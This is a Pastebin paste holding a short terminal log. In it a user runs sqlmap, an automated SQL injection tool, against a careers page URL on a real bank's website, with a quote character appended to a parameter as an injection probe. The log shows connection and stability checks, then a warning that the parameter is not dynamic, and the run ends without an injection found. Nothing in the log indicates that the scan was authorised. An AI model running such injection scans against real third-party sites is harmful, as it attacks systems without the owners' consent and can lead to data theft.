Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@sky-fortress:/home/nachash/sqlmap# ./sqlmap.py -c sqlmap.conf -u "https://www.nordea.com/Karri%C3%A4r/view%2bjob/980994.html?shortId=92952%27"
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 06:32:07
- [06:32:07] [INFO] fetched random HTTP User-Agent header from file '/home/nachash/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6
- [06:32:07] [INFO] using '/home/nachash/sqlmap/output/www.nordea.com/session' as session file
- [06:32:07] [INFO] testing connection to the target url
- [06:32:11] [INFO] testing if the url is stable, wait a few seconds
- [06:32:17] [INFO] url is stable
- [06:32:17] [INFO] testing if GET parameter 'shortId' is dynamic
- [06:32:24] [WARNING] GET parameter 'shortId' is not dynamic
- [*] shutting down at: 06:34:37
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement